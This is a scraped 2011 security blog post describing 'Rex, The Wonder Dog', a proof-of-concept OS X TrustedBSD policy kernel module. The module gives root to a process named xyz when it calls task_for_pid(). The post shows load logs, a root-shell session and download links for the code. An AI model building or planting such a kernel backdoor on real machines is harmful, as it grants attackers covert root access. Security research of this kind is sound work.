Abusing OS X TrustedBSD framework to install r00t backdoors...
source link: https://reverse.put.as/2011/09/18/abusing-os-x-trustedbsd-framework-to-install-r00t-backdoors/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Abusing OS X TrustedBSD framework to install r00t backdoors...
While poking around OS X implementation of TrustedBSD to write the sandbox guide I had the idea of trying to abuse it for backdooring purposes. It’s kind of funny that something designed to protect can be so “easily” abused to install backdoors. This is not rocket science or a big breakthru post – I was just curious about the possibility to abuse the framework. You still need to find a way to install the kernel module!
So without further delay, I present you Rex, The Wonder Dog. It is a very simple policy module for TrustedBSD that gives r00t privileges to a process named xyz, if it calls task_for_pid(). For some unknown reason I couldn’t yet do the same with fork() (it was only working for Safari). I was doing this at 3am so I really didn’t bothered too much about it. It is based on SEDarwin sample policies code.
I had some trouble to compile the policy module (duplicate symbols) if I try to use the macro to initialize the module. I strongly suspect this is because I am using XCode’s kernel extension template. This is just a lazy PoC.
The code is unstable. Processes start crashing and crash reporter isn’t executing. It could be due to the very lazy way that r00t privileges are changed for the target process (it only starts to happen after backdoor is activated). Kernel land is dangerous territory! It is tested only with Snow Leopard 10.6.8. Might work with Lion without any problems. Load it as a normal kernel module with kextload.
dmesg log when module is loaded:
calling mpo_policy_init for rex_the_wonder_dog
calling mpo_policy_initbsd for rex_the_wonder_dog
Security policy loaded: Rex, the wonder dog! (rex_the_wonder_dog)
Starting the backdoor and getting a r00t shell:
$ ./xyz
[info] calling task_for_pid()
[info] task for pid returned 0
[info] uid 501 euid 0
[info] setting uid to 0...
[info] uid 0 euid 0
[info] executing r00t shell...
# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),204(_developer),100(_lpoperator),98(_lpadmin),80(admin),
61(localaccounts),29(certusers),20(staff),12(everyone),9(procmod),8(procview),5(operator),4(tty),3(sys),2(kmem),1(daemon),
401(com.apple.access_screensharing),402(com.apple.sharepoint.group.1)
Policy modules open interesting possibilities for implementing other things. Maybe your own binary integrity check module? Or maybe some nice anti-debug for software who must use kernel modules.
Sorry for the lazy and unstable code. I’m not that much interested in backdoors, I was just interested in testing the possibility. It’s (just) a clean way to activate a kernel backdoor. If you improve and want to share your code feel free to send it!
Have fun,
fG!
Here are the goodies.
rexthewonderdog_v0.1.zip
SHA256(rexthewonderdog_v0.1.zip)= 4d75ab5859d6a3259de12a9e21a7ee4530b1bc1adb673e2fb24a4f66b9109eac
xyz.c
SHA256(xyz.c)= 3e24337fc7b61f392066e0812051007e8942060a2906d720d345f019de894576
Recommend
-
58
README.md project:rosenbridge : hardware backdoors in x86 CPUs github.com/xoreaxeaxeax/rosenbridge // domas // @xoreaxeaxeax
-
28
Many cryptographic standards widely used in commercial applications were developed by the U.S. Government’s National Institute of Standards and Technology (NIST). Normally government involvement in developing ciphers for p...
-
15
NewsJune 26, 2020New US Bill would require makers of encrypted devices to leave a backdoor
-
17
JavaScript library posing as a Twilio-related library opens backdoors to let attackers access infected workstations.
-
9
Using GitHub code scanning and CodeQL to detect traces of Solorigate and other backdoors Last month, a member of the CodeQL security community contributed
-
5
Google says it won’t build backdoors in FLoC, Privacy Sandbox Google is dead set on eliminating third-party cookies from the internet, and leading the charge has been the company’s controversial FLoC initiative. This week, Google has com...
-
3
a TrustedBSD policy module to control suid binaries execution Let me present you another TrustedBSD policy module, this time to control execution of suid enabled binaries. The idea to create thi...
-
3
Fixes for the TrustedBSD backdoor – Rex the wonder dog v0.2 I like things well done and the healthy discussion with snare about this topic remembered me this PoC was a bit incomplete. So I decided to close the missing...
-
2
Using OS X TrustedBSD framework to protect critical files And here we are with a few spare minutes! My baby girl is a little cute devil who, like me, isn’t very found of sleeping all the time. She’s taking a lot of my attention so mom...
-
3
Teaching Rex another TrustedBSD trick to hide from Volatility Rex the Wonder Dog (here and
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK